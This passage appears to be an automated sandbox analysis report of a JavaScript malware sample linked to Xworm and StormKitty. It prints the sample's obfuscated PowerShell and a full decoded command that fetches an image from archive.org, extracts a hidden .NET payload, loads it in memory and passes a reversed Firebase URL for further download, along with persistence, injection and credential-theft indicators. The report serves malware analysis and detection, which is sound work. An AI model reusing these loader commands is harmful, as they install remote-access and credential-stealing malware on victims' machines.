▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷bwBh㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQBk㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷cwBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBi㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷eQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷UgBl㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bg㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷cwBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBi㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷eQBd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBM㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YQBk㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷B0㏵ ⊷ ➟ ⇒ ▷Hk㏵ ⊷ ➟ ⇒ ▷c㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷QQBz㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷RwBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bu㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷aQBi㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷SQBP㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷S㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷bwBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷Ec㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷E0㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷bwBk㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷JwBW㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷SQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷LgBJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷dgBv㏵ ⊷ ➟ ⇒ ▷Gs㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷bgB1㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷WwBv㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷agBl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷F0㏵ ⊷ ➟ ⇒ ▷XQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷z㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷3㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷ZQBh㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷1㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷Mw㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Dg㏵ ⊷ ➟ ⇒ ▷Mw㏵ ⊷ ➟ ⇒ ▷3㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷LQBm㏵ ⊷ ➟ ⇒ ▷DM㏵ ⊷ ➟ ⇒ ▷Yg㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷C0㏵ ⊷ ➟ ⇒ ▷MgBl㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷MQ㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZgBk㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷Zg㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZQBr㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷m㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷aQBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQ㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷D8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷B4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷Lg㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷y㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷4㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Ng㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷cgBv㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷bwBs㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷bw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷bwBj㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷cwBw㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷YQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷DI㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷eQBy㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷LwBi㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷B2㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷bQBv㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷LgBz㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷c㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bn㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bwBn㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷ZQBn㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgBv㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷YQBi㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cgBp㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷Lw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷cwBw㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bo㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷JwBD㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷X㏵ ⊷ ➟ ⇒ ▷BQ㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷bwBn㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQBt㏵ ⊷ ➟ ⇒ ▷EQ㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷X㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷L㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷ZQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷YQB1㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQBu㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Cw㏵ ⊷ ➟ ⇒ ▷JwBB㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷U㏵ ⊷ ➟ ⇒ ▷By㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YwBl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷z㏵ ⊷ ➟ ⇒ ▷DI㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷dgBh㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷bw㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('㏵ ⊷ ➟ ⇒ ▷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('34e7beafd5a3-837a-f3b4-2ee1-afdf4ecf=nekot&aidem=tla?txt.1042028060mrowxenol/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'estauranthera','AddInProcess32','desativado'))"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ia601606.us.archive.org | udp |
| US | 207.241.227.86:443 | ia601606.us.archive.org | tcp |
| US | 207.241.227.86:443 | ia601606.us.archive.org | tcp |
Files
memory/2204-4-0x000007FEF59CE000-0x000007FEF59CF000-memory.dmp
memory/2204-5-0x000000001B660000-0x000000001B942000-memory.dmp
memory/2204-6-0x0000000002340000-0x0000000002348000-memory.dmp
memory/2204-7-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp
memory/2204-8-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp
memory/2204-10-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp
memory/2204-9-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a705e05cc92e2476905d2dfbf508223b |
| SHA1 | 87ab247e6ae4c59b253e4db7dcb766e25a824914 |
| SHA256 | e6888032a320cdf8818cef1b91726f2c0f8b9aa6a72782a50e492fd82c0ff758 |
| SHA512 | 70346abe7097975f85cbc993031a76b1feaaa274feb027bc2a4767dd4141b930b2b0520237dbc4ffbce360467407e7a8fec7fe46134f5a1f1a331c0c71629fbd |
memory/2204-12-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp
memory/2204-17-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-09 19:41
Reported
2024-08-09 19:44
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\estauranthera.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3968 set thread context of 1360 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷VQBy㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷JwBo㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bw㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷Og㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQBh㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷dQBz㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷HY㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷cgBn㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷MQ㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBz㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bo㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷bwB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Xw㏵ ⊷ ➟ ⇒ ▷y㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Nw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQBh㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bu㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷agBw㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷dwBl㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷QwBs㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷LQBP㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷agBl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBX㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷YgBD㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷aQBl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷ZQBi㏵ ⊷ ➟ ⇒ ▷EM㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bp㏵ 